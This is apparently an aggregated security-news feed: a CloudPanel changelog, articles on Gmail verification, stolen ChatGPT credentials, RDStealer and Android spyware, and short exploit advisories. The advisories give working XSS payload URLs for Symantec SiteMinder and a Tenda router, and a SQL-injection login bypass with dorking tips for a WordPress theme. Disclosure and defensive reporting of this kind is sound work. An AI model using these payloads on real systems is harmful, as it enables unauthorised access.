CloudPanel 2 before 2.3.1 has insecure file-manager cookie authentication.

**v2.3.1 - \[2023-06-20\]#**

**Bug Fixes**

*   #287 Colon in remote cloud backup breaks most filesystems
*   #290 File Manager Extract not working since v2.3.0
*   #293 Strange \\n\\n inside the certificate file used for custom domain.
*   Translation Fixes

**Security**

*   Critical (CVE-2023-35885): Insecure file manager cookie authentication (Muhammad Aizat, datack.my)
*   Insecure File Upload leads to Privilege Escalation and Authentication Bypass (Muhammad Zulfiqar)

**v2.3.0 - \[2023-06-06\]#**

**New**

*   Translation: Bulgarian
*   New CloudPanel CLI Root Commands:
    *   User:
        *   user:add
        *   user:delete
        *   user:list
    *   Site:
        *   site:install:certificate

**Enhancements**

*   The site user name and password can be entered manually for new WordPress sites.

**Bug Fixes**

*   #278 CLI need normalize domain name field
*   #284 CLPCTL - Problem with special characters in password result false error
*   Translation Fixes

**Security**

*   Critical (CVE-2023-33747): Privilege Escalation to root from user. Big thanks to Muhammad (datack.my, host.sabily.info) for reporting and testing
*   OS Command Injection. Big thanks to Laurence from crowdsec.net for reporting and testing

**v2.2.2 - \[2023-04-03\]#**

**New**

*   MariaDB 10.11 LTS Support
*   Hebrew
*   Japanese

**Bug Fixes**

*   #245 New Reverse Proxy | root folder permission in htdocs www.site.com folders
*   #254 Site path / copy and paste issues
*   Translation Fixes

**v2.2.1 - \[2023-02-27\]#**

**New**

*   Reverse Proxy
*   Chinese (Simplified)
*   Chinese (Taiwan)

**Bug Fixes**

*   #210 Dark mode: Separating table borders missing
*   #220 Hetzner Snapshot cleanup throws an exception when delete protection is enabled on a snapshot
*   Translation Fixes

**v2.2.0 - \[2022-12-08\]#**

**New**

*   Add PHP 8.2 Support
*   Dark Mode
*   Node.js 18 LTS Support

**Improvements**

*   File Manager order Directories before Files

**Bug Fixes**

*   #208 Unable to create a WordPress site with a database server that doesn't use the default port 3306
*   Translation Fixes

**v2.1.0 - \[2022-11-03\]#**

**New**

*   Varnish Cache Support

**Improvements**

*   Generate Password Link for Site User Password Update

**Bug Fixes**

*   #138 WordPress Admin login doesn't work with passwords which contains special characters like
*   #150 Cron Job PHP version issue
*   #153 Backup Custom Rclone Config Time
*   Translation Fixes

**v2.0.4 - \[2022-09-08\]#**

**New**

*   Added Languages: Arabic, Ukrainian

**Bug Fixes**

*   #137 Remote backups don't get deleted after configured retention period, it affects only the SFTP storage provider
*   Translation Fixes
*   MariaDB 10.9 Support

**v2.0.3 - \[2022-08-24\]#**

**New**

*   Remote Backup (Amazon S3, Wasabi, Digital Ocean Spaces, Dropbox, Google Drive, SFTP and Custom Rclone Config)
*   Added Languages: Italian, Indonesian, Spanish, Romanian, Russian, Polish, Vietnamese

**Bug Fixes**

*   #115 Using " in the additional directives configuration breaks CloudPanel
*   #122 Numeral in Domain Name Can't Install Wordpress
*   #132 413 Request Entity Too Large, File Manager file upload over 512MB with custom domain

**v2.0.2 - \[2022-07-04\]#**

**Bug Fixes**

*   Remove FS\_CHMOD\_FILE and FS\_CHMOD\_DIR from default WP settings

**v2.0.1 - \[2022-07-04\]#**

**New**

*   Added Portuguese (Brasil) translation
*   Added Turkish translation
*   MariaDB 10.8 support for Ubuntu and Debian
*   Added Default WP settings:
    *   WP\_MEMORY\_LIMIT: 256M
    *   WP\_MAX\_MEMORY\_LIMIT: 512M
    *   FS\_CHMOD\_FILE: 0644
    *   FS\_CHMOD\_DIR: 0755

**Bug Fixes**

*   Site User Name generation didn't work with a two-level subdomain like wp.blog.eu.org
*   Translations fixes

**v2.0.0 - \[2022-06-20\]#**

*   Initial Release

*   v2.3.1 - 2023-06-20
*   v2.3.0 - 2023-06-06
*   v2.2.2 - 2023-04-03
*   v2.2.1 - 2023-02-27
*   v2.2.0 - 2022-12-08
*   v2.1.0 - 2022-11-03
*   v2.0.4 - 2022-09-08
*   v2.0.3 - 2022-08-24
*   v2.0.2 - 2022-07-04
*   v2.0.1 - 2022-07-04
*   v2.0.0 - 2022-06-20

CVE-2023-35885: Changelog | CloudPanel | Documentation

It's still important to use other security measures, such as strong passwords and two-factor authentication, to protect your data.

Google has introduced new blue verified check marks for Gmail addresses. According to Google, the new feature helps protect inboxes against malicious and unwanted emails and increases confidence that those emails are from legitimate sources. Gmail users who added Google's Brand Indicators for Message Identification (BIMI) feature will now see a check mark icon instead of the verified brand logo.

Creating a verification process makes sense — until hackers and spammers decide to make it their mission to find flaws in the capability. Bypassing blue check marks will be another chapter in the long history of business email compromise schemes designed to propagate malicious code. By sending out emails with impersonated blue check marks, legacy security protection layers will likely pass the message to the suspecting victims.

**Another Layer of Protection or Just Another Layer?**

Hackers can create fake email accounts that look like they have been verified by Google. They can create a new account and then use a tool to generate a fake verification badge. Once the account has been created, the hacker can then send phishing emails or other malicious messages that appear to come from a legitimate source.

Hackers can use social engineering to trick users into revealing their passwords. They can send emails that appear to be from a legitimate source, such as a bank, government agency, or customer service representative. Or they may create a message that offers a free gift or discount. The email typically will contain a link that takes the user to a fake website that looks like the real thing. Once the user enters their login credentials, the hacker can then use them to access the user's Gmail account.

Hackers can use malware to steal login credentials. This can be done by sending emails that contain attachments infected with malware. Once the user opens the attachment, the malware will be installed on their computer. The malware can then be used to steal the user's login credentials for Gmail and other online accounts.

Also, don't be surprised when hackers send phishing emails with an artificial Gmail verification process to potential victims, fooling them into thinking they're helping them earn their blue check marks and stealing their credentials instead.

Creating accounts impersonating a domain and a user isn't something new. Email impersonation, especially with recently established email-sending domains, continues to create havoc with organizations trying to avoid email phishing attacks. Hackers have made these accounts and placed a fake verified badge to fool the receiving email user.

**Integrating Security Layers Continue to Be a Proven Strategy**

To contend with this new attack vector, organizations must invest in security solutions, including DMARC, SPF, and DKIM for domain authentication, sandboxing all attachments, and leveraging threat intelligence to help stop malware.

Using passwords with multifactor authentication, leveraging one-time passwords, biometrics, and even challenge and reply tokens could help businesses protect its data while standardizing a universal authentication strategy across the company.

The continuous investment in security as a platform instead of bolting on a new control layer is a wise move. With every innovative way to stop hackers from impersonating, stealing data, and spreading malware, there will be an element of exploitation the hackers will soon discover.

Security platforms using agile and DevOps rapid deployment can quickly add additional protection layers without the everyday user experience. Through the rapid deployment of features, security providers can respond quickly to changing threat landscape without causing service outages or exposing organizations to other attack vectors.

Google's new verified blue check mark feature is just one layer of security. It is important to use other security measures, such as strong passwords and multifactor authentication, to protect your Gmail account. And companies must continue to invest in end-user education and security awareness training to make sure those verified emails actually come from authentic people.

Hackers Will Be Quick to Bypass Gmail's Blue Check Verification System

By Waqas
Most of the hacked ChatGPT accounts originated from India, Pakistan, and Brazil.
This is a post from HackRead.com Read the original post: 100,000 Hacked ChatGPT Accounts Discovered on Dark Web

**This was discovered by Group-IB’s cybersecurity researchers, who noted that 100,000 devices were infected by Raccoon, Vidar, and Redline malware, which held compromised ChatGPT credentials.**

In a recent investigation, cybersecurity researchers at Group-IB have uncovered a concerning trend involving over 100,000 devices infected with stealers, holding compromised ChatGPT credentials.

Through their Threat Intelligence platform, Group-IB found logs of info-stealing malware traded on illicit dark web markets, with a peak of 26,802 compromised ChatGPT accounts recorded in May 2023. The Asia-Pacific region experienced the highest concentration of compromised ChatGPT credentials for sale over the past year, according to the report.

Experts at Group-IB emphasize the growing adoption of ChatGPT by employees across various industries, from software development to business communications. The default settings of ChatGPT store user queries and AI responses, potentially exposing confidential information to unauthorized access and posing a risk of targeted attacks against companies and individuals.

The popularity of ChatGPT accounts within underground communities has surged, as noted in Group-IB’s findings. One example is the eagerness of Russian hackers to abuse ChatGPT’s restrictions in order to create malware and carry out other malicious activities.

Group-IB’s Threat Intelligence platform, which monitors dark web activities in real-time, has become a vital resource for identifying compromised credentials, stolen credit cards, fresh malware samples, and access to corporate networks.

The analysis further revealed that a majority of ChatGPT accounts were breached by the notorious Raccoon info stealer, underscoring the simplicity and effectiveness of info stealers in harvesting personal data. These compromised logs are actively traded on dark web marketplaces, often including additional details such as compromised host IP addresses and associated domain lists.

Analyzing the information collected, Group-IB identified the countries and regions with the highest concentration of devices infected by stealers and holding compromised ChatGPT credentials. The Asia-Pacific region accounted for 40.5% of the ChatGPT accounts stolen by info stealers between June 2022 and May 2023.

In a press release shared with Hackread.com by Group-IB, Dmitry Shestakov, Head of Threat Intelligence, highlighted the need for vigilance and emphasizes the importance of promptly identifying compromised accounts in underground communities.

Group-IB recommends regular password updates and the implementation of two-factor authentication (2FA) to mitigate the risks associated with compromised ChatGPT accounts.

**How to Secure a ChatGPT Account**

Securing ChatGPT and other accounts is crucial to protect sensitive information and prevent unauthorized access. Here are some measures to enhance the security of ChatGPT accounts:

**Strong Passwords:** Create strong and unique passwords for ChatGPT accounts. Use a combination of uppercase and lowercase letters, numbers, and special characters. Avoid using easily guessable passwords or reusing passwords from other accounts.

**Two-Factor Authentication (2FA):** Enable 2FA whenever possible. This adds an extra layer of security by requiring an additional verification step, such as a unique code sent to a mobile device, to access the ChatGPT account.

**Regular Password Updates:** Periodically change passwords for ChatGPT accounts to minimize the risk of unauthorized access. Avoid using the same password for an extended period and ensure new passwords are strong and unique.

**Account Monitoring:** Regularly monitor ChatGPT accounts for any suspicious activity or unauthorized access. Keep an eye on login history, account settings, and any unusual behaviour. If any suspicious activity is detected, take immediate action, such as resetting the password and reporting the incident to the service provider.

**Be Cautious with Sharing:** Avoid sharing ChatGPT account credentials with others unless necessary. Keep the login details confidential and discourage sharing of account information, especially with unknown or untrusted individuals.

**Stay Updated:** Keep the ChatGPT application and associated software up to date. Software updates often include security patches that address vulnerabilities and enhance overall security.

**Be Wary of Phishing Attempts:** Stay vigilant against phishing attempts, where attackers try to trick users into revealing their account credentials. Be cautious of emails, messages, or links asking for personal information or login details. Verify the authenticity of communications before providing any sensitive information.

**Secure Devices:** Ensure that the devices used to access ChatGPT accounts are protected with up-to-date antivirus software, firewalls, and operating system patches. Regularly scan for malware or suspicious activities on devices to maintain their security.

**Regular Security Awareness Training:** Educate users about best practices for account security, such as the importance of strong passwords, recognizing phishing attempts, and safe browsing habits. Regularly train users to enhance their understanding of potential risks and how to mitigate them.

**Limit Data Storage:** If possible, configure ChatGPT to minimize or avoid storing chat history or sensitive information. Limiting the amount of data stored can help reduce the impact in case of a data breach.

We hope that by following these security measures, users can significantly reduce the risk of unauthorized access and protect their ChatGPT accounts and the information associated with them.

**RELATED ARTICLES**

1.  Scammers Pose as ChatGPT in New Phishing Scam
2.  Fake ChatGPT Extension Hijacks Facebook Accounts
3.  DarkBERT: Enhancing Cybersecurity Efforts on the Dark Web
4.  OpenAI – ChatGPT Bug Bounty Program – Earn $200 to $20k
5.  Malicious ChatGPT & Google Bard Installers Drop RedLine Stealer

100,000 Hacked ChatGPT Accounts Discovered on Dark Web

Symantec SiteMinder WebAgent version 12.52 suffers from a cross site scripting vulnerability.

    Exploit Title: Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)Google Dork: N/ADate: 18-06-2023Exploit Author: Harshit JoshiVendor Homepage: https://community.broadcom.com/homeSoftware Link: https://www.broadcom.com/products/identity/siteminderVersion:  12.52Tested on: Linux, WindowsCVE: CVE-2023-23956Security Advisory: https://support.broadcom.com/external/content/SecurityAdvisories/0/22221*Description:*I am writing to report two XSS vulnerabilities (CVE-2023-23956) that I havediscovered in the  Symantec SiteMinder WebAgent. The vulnerability isrelated to the improper handling of user input and has been assigned theCommon Weakness Enumeration (CWE) code CWE-79. The CVSSv3 score for thisvulnerability is 5.4.Vulnerability Details:---------------------*Impact:*This vulnerability allows an attacker to execute arbitrary JavaScript codein the context of the affected application.*Steps to Reproduce:**First:*1) Visit -https://domain.com/siteminderagent/forms/login.fcc?TYPE=xyz&REALMOID=123&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%222) After visiting the above URL, click on the "*Change Password*" button,and the popup will appear.- The *SMAGENTNAME *parameter is the source of this vulnerability.*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="**Second:*1) Visit -https://domain.com/siteminderagent/forms/login.fcc?TYPE=123&TARGET=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%222) After visiting the above URL, click on the "*Change Password*" button,and the popup will appear.- The *TARGET *parameter is the source of this vulnerability.*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*

Symantec SiteMinder WebAgent 12.52 Cross Site Scripting

WordPress Kero jQuery/HTML Dashboard PRO theme version 2.3.86 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : WordPress - Kero jQuery/HTML Dashboard PRO Auth BY pass Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.2(64-bit)                                            | | # Vendor    : https://dashboardpack.com/theme-details/kero-jquery-html-dashboard-pro/                                            |  | # Dork      :                                                                                                                    |====================================================================================================================================P0C :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /panel/sign-in.php[+] User & Pass :  ' or 0=0 #[+] https://127.0.0.1/spdmuniversal.in/panel/sign-in.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |=======================================================================================================================================

WordPress Kero jQuery/HTML Dashboard PRO 2.3.86 SQL Injection

Tenda AC6 AC1200 version 15.03.06.50_multi suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Stored Cross-Site scripting in the Tenda router via the deviceId parameter in the Parental Control module# Google Dork: None.# Date: Aug-30-2022# Exploit Author: 0x783# Vendor Homepage: https://tendacn.com/default.html# Software Link: https://www.tendacn.com/product/download/AC6.html# Version: AC6 AC1200 Smart Dual-Band WiFi Router - V15.03.06.50_multi# Tested on: Linux 5.15.0-58-generic# CVE : CVE-2022-40010-------------------------------------------------------------------------# 1. Technical Description:Tenda AC6 AC1200 Smart Dual-Band WiFi Router V15.03.06.50 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the deviceId parameter in the parental control section.# Steps to reproduce:1- Navigate to the router webserver usually at "http://192.168.0.1", or whatever the address of the router is.2- Navigate to the parental control section from the side bar.3- Add a new device to the list with any fake MAC address, device name, URL.4- Intercept the request using burpsuite and change the "deviceId" parameter to any javascript code (EX: <script>alert(document.domain")</script>).5- A pop-up with the domain should appear.

Tenda AC6 AC1200 15.03.06.50_multi Cross Site Scripting

There exists a use after free/double free in libwebp. An attacker can use the ApplyFiltersAndEncode() function and loop through to free best.bw and assign best = trial pointer. The second loop will then return 0 because of an Out of memory error in VP8 encoder, the pointer is still assigned to trial and the AddressSanitizer will attempt a double free. 


)\]}' { "name": "webm/libwebp", "clone\_url": "https://chromium.googlesource.com/webm/libwebp" }

CVE-2023-1999

A highly targeted cyber attack against an East Asian IT company involved the deployment of a custom malware written in Golang called RDStealer.
"The operation was active for more than a year with the end goal of compromising credentials and data exfiltration," Bitdefender security researcher Victor Vrabie said in a technical report shared with The Hacker News.
Evidence gathered by the Romanian

A highly targeted cyber attack against an East Asian IT company involved the deployment of a custom malware written in Golang called **RDStealer**.

"The operation was active for more than a year with the end goal of compromising credentials and data exfiltration," Bitdefender security researcher Victor Vrabie said in a technical report shared with The Hacker News.

Evidence gathered by the Romanian cybersecurity firm shows that the campaign started in early 2022. The target was an unspecified IT company located in East Asia.

In the early phases, the operation relied on readily available remote access trojans like AsyncRAT and Cobalt Strike, before transitioning to bespoke malware in late 2021 or early 2022 in a bid to thwart detection.

A primary evasion tactic concerns the use of Microsoft Windows folders that are likely to be excluded from scanning by security software (e.g., System32 and Program Files) to store the backdoor payloads.

One of the sub-folders in question is "C:\\Program Files\\Dell\\CommandUpdate," which is the directory for a legitimate Dell application called Dell Command | Update.

Bitdefender said all the machines infected over the course of the incident were manufactured by Dell, suggesting that the threat actors deliberately chose this folder to camouflage the malicious activity.

This line of reasoning is bolstered by the fact that the threat actor registered command-and-control (C2) domains such as "dell-a\[.\]ntp-update\[.\]com" with the goal of blending in with the target environment.

The intrusion set is characterized by the use of a server-side backdoor called RDStealer, which specializes in gathering clipboard content and keystroke data from the host.

But what makes it stand out is its capability to "monitor incoming RDP \[Remote Desktop Protocol\] connections and compromise a remote machine if client drive mapping is enabled."

Thus when a new RDP client connection is detected, commands are issued by RDStealer to exfiltrate sensitive data, such as browsing history, credentials, and private keys from apps like mRemoteNG, KeePass, and Google Chrome.

"This highlights the fact that threat actors actively seek credentials and saved connections to other systems," Bitdefender's Marin Zugec said in a second analysis.

UPCOMING WEBINAR

🔐 Mastering API Security: Understanding Your True Attack Surface

Discover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!

Join the Session

What's more, the connecting RDP clients are infected with another Golang-based custom malware known as Logutil to maintain a persistent foothold on the victim network using DLL side-loading techniques and facilitate command execution.

Not much is known about the threat actor other than the fact that it has been active dating back to at least 2020.

"Cybercriminals continually innovate and explore novel methods to enhance the reliability and stealthiness of their malicious activities," Zugec said.

"This attack serves as a testament to the increasing sophistication of modern cyber attacks, but also underscores the fact that threat actors can leverage their newfound sophistication to exploit older, widely adopted technologies."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Experts Uncover Year-Long Cyber Attack on IT Firm Utilizing Custom Malware RDStealer

Categories: Podcast
This week on Lock and Code, we speak with Lisa Kaplan about why every business with an online presence should ready themselves against a potential disinformation campaign. 



(Read more...)




The post Why businesses need a disinformation defense plan, with Lisa Kaplan: Lock and Code S04E13 appeared first on Malwarebytes Labs.

When you think about the word "cyberthreat," what first comes to mind? Is it ransomware? Is it spyware? Maybe it's any collection of the infamous viruses, worms, Trojans, and botnets that have crippled countless companies throughout modern history. 

In the future, though, what many businesses might first think of is something new: Disinformation. 

Back in 2021, in speaking about threats to businesses, the former director of the US Cybersecurity and Infrastructure Security Agency, Chris Krebs, told news outlet Axios: “You’ve either been the target of a disinformation attack or you are about to be.”

That same year, the consulting and professional services firm Price Waterhouse Coopers released a report on disinformation attacks against companies and organizations, and it found that these types of attacks were far more common than most of the public realized. From the report: 

“In one notable instance of disinformation, a forged US Department of Defense memo stated that a semiconductor giant’s planned acquisition of another tech company had prompted national security concerns, causing the stocks of both companies to fall. In other incidents, widely publicized unfounded attacks on a businessman caused him to lose a bidding war, a false news story reported that a bottled water company’s products had been contaminated, and a foreign state’s TV network falsely linked 5G to adverse health effects in America, giving the adversary’s companies more time to develop their own 5G network to compete with US businesses.”

Disinformation is here, and as much of it happens online—through coordinated social media posts and fast-made websites—it can truly be considered a "cyberthreat." 

But what does that mean for businesses? 

Today, on the Lock and Code podcast with host David Ruiz, we speak with Lisa Kaplan, founder and CEO of Alethea, about how organizations can prepare for a disinformation attack, and what they should be thinking about in the intersection between disinformation, malware, and cybersecurity. Kaplan said:

> "When you think about disinformation in its purest form, what we're really talking about is people telling lies and hiding who they are in order to achieve objectives and doing so in a deliberate and malicious life. I think that this is more insidious than malware. I think it's more pervasive than traditional cyber attacks, but I don't think that you can separate disinformation from cybersecurity."

Tune in today. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use. 

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

Why businesses need a disinformation defense plan, with Lisa Kaplan: Lock and Code S04E13

Individuals in the Pakistan region have been targeted using two rogue Android apps available on the Google Play Store as part of a new targeted campaign.
Cybersecurity firm Cyfirma attributed the campaign with moderate confidence to a threat actor known as DoNot Team, which is also tracked as APT-C-35 and Viceroy Tiger.
The espionage activity involves duping Android smartphone owners into

Cyber Espionage / Mobile Security

Individuals in the Pakistan region have been targeted using two rogue Android apps available on the Google Play Store as part of a new targeted campaign.

Cybersecurity firm Cyfirma attributed the campaign with moderate confidence to a threat actor known as DoNot Team, which is also tracked as APT-C-35 and Viceroy Tiger.

The espionage activity involves duping Android smartphone owners into downloading a program that's used to extract contact and location data from unwitting victims.

"The motive behind the attack is to gather information via the stager payload and use the gathered information for the second-stage attack, using malware with more destructive features," the company said.

DoNot Team is a suspected India-nexus threat actor that has a reputation for carrying out attacks against various countries in South Asia. It has been active since at least 2016.

While an October 2021 report from Amnesty International linked the group's attack infrastructure to an Indian cybersecurity company called Innefu Labs, Group-IB, in February 2023, said it identified overlaps between DoNot Team and SideWinder, another suspected Indian hacking crew.

Attack chains mounted by the group leverage spear-phishing emails containing decoy documents and files as lures to spread malware. In addition, the threat actor is known to use malicious Android apps that masquerade as legitimate utilities in their target attacks.

These apps, once installed, activate trojan behavior in the background and can remotely control the victim's system, besides pilfering confidential information from the infected devices.

The latest set of applications discovered by Cyfirma originate from a developer named "SecurITY Industry" and pass off as VPN and chat apps, with the latter still available for download from the Play Store -

*   iKHfaa VPN (com.securityapps.ikhfaavpn) - 10+ downloads
*   nSure Chat (com.nSureChat.application) - 100+ downloads

The VPN app, which reuses source code taken from the genuine Liberty VPN product, is no longer hosted on the official app storefront, although evidence shows that it was available as recently as June 12, 2023.

The low download counts is an indication that the apps are being used as part of a highly targeted operation, a hallmark of nation-state actors. Both apps are configured to trick the victims into granting them invasive permissions to access their contact lists and precise locations.

Little is known about the victims targeted using the rogue apps barring the fact that they are based in Pakistan. It's believed that users may have been approached via messages on Telegram and WhatsApp to lure them into installing the apps.

By utilizing the Google Play Store as a malware distribution vector, the approach abuses the implicit trust placed by users on the online app marketplace and lends it an air of legitimacy. It's, therefore, essential that apps are carefully scrutinized prior to downloading them.

"It appears that this Android malware was specifically designed for information gathering," Cyfirma said. "By gaining access to victims' contact lists and locations, the threat actor can strategize future attacks and employ Android malware with advanced features to target and exploit the victims."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#google